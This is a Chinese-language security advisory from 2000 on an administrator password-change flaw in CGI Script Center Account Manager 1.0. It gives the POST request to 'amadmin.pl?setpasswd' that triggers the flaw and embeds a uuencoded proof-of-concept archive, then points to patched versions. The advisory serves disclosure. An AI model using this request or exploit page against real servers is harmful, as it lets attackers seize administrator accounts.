首页 -> 安全研究

安全研究

安全漏洞
CGI Script Center帐号管理器管理员口令更改漏洞

发布日期:2000-08-24
更新日期:2000-08-24

受影响系统:

    CGI Script Center Account Manager PRO 1.0
    CGI Script Center Account Manager LITE 1.0
       - Sun SunOS 4.1.4
       - Sun Solaris 8.0
       - RedHat Linux 6.2
       - Microsoft Windows NT 4.0
       - Microsoft Windows NT 2000
描述:

无论远程用户拥有什么级别的权限,都可以更改CGI Script Centers' Account Manager
的管理员口令,他只需要以POST方式提交一个URL请求:
http://target/cgibin/amadmin.pl?setpasswd

<* 来源:n30 (n30@alldas.de) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


n30提供了一个测试页面:

begin 666 sploit.zip
M4$L#!!0``@`(`(IS%RG=)HE/E (``-P&```+````17AP;&]I="YH=&VM5=]O
MVC 0?D?B?SB\UP;3;GNIDFBA"242D"@Q0]V;F[C%6A*CQ&W:_?6[$'X,-E2J
M#BG@'.>[[^X[?S9'030%YX;YP<PB2ZU7UY36==U/1:*:IY^HG":/TKB7!>5)
MHG..OSE/<UGT5QF!J<?&@6N1,(@9L<T;;\:\R#:'D=WMF,P93CP8!I'K1189
M$%CX+AM;Y,O7`?JR8>#>X99@XGJC>+NP3;JS1,$"OQG&8VZW@^:8.1&SR"7N
M#C&);8Z"&8.1<^-9Y%F4*2_X!?!2\NP"EB)[%EHFG+1NZP`!XO@T&@WP0VPG
M2=13H6&*VQY%"1.?>32,`I,V_O8U0,BKJE9E"M[+*E-2]S9_F11ST["I<5OQ
M.Y <XR@^#X[B8@_:L)@@W,2._1\8V[@D;V<),\$K`:+06-6K>BIAM2U$US(1
M?8"@2 1H!970(#4&*5)0&UNBB@=9YFCO[W =U'K,ZVDN3W/:[32L@C/Q;W'T
M(O]VS @<4NS/PCD#=A=BM:$3QPM,2&#F3/%]5:?H09E[/!M7Y+!?5V?T:]N=
M7;5-6,K:&8X^BO/J_P'=,,.U5,7;8%NZCM'BT6P1=SLMY'@^G/IL"Q@'HNDM
M?'<F<WP%B'%"=N<`]K7 82E-V!T4D[8TT\U<T/7$[,?Z<)*ZG7](Q.#C$C&.
M-KV])']B.Z=)K6"\@QD4HU-R`DZCEFT/Q5Y+D*[U:7?LOYA\LWUG>QX)U+8=
M9]734 I,P1RE9*I2^? *,6H):@0:0R6Q5!2+_66 ^@'8P5L/1UJ4&!O60]$\
M'):E>+!(SF6FU34*WC>>92FO\*(A=F,U<F%2?@"<-I<3+G#9,PR(E^I)_VI2
MZE+>(^87455KW<)04"\5_"Q4#;GH@6'@MM]02P$"% `4``(`" "*<Q<IW2:)
M3Y0"``#<!@``"P`````````!`" `MH$`````17AP;&]I="YH=&U02P4&````
/``$``0`Y````O0(`````
`
end


建议:

CGI Script Center 发布了升级版:

Account Manager LITE
http://www.cgiscriptcenter.com/acctlite/

Account Manager PRO
http://www.cgiscriptcenter.com/acctman/


浏览次数:8549
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障